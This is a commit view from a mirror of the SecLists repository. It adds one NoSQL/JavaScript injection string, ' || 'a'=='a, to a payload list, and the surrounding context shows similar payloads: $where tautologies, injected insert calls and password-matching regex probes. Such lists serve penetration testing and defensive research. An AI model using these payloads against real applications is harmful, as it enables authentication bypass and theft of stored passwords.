mirror of
https://github.com/danielmiessler/SecLists
synced 2026-01-17 13:42:48 +01:00
Merge pull request #502 from danrneal/patch-1
Add string js or injection
This commit is contained in:
commit
411cae8e5b
1 changed files with 1 additions and 0 deletions
|
|
@ -9,6 +9,7 @@ $where: '1 == 1'
|
|||
db.injection.insert({success:1});
|
||||
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|
||||
|| 1==1
|
||||
' || 'a'=='a
|
||||
' && this.password.match(/.*/)//+%00
|
||||
' && this.passwordzz.match(/.*/)//+%00
|
||||
'%20%26%26%20this.password.match(/.*/)//+%00
|
||||
|
|
|
|||
Loading…
Reference in a new issue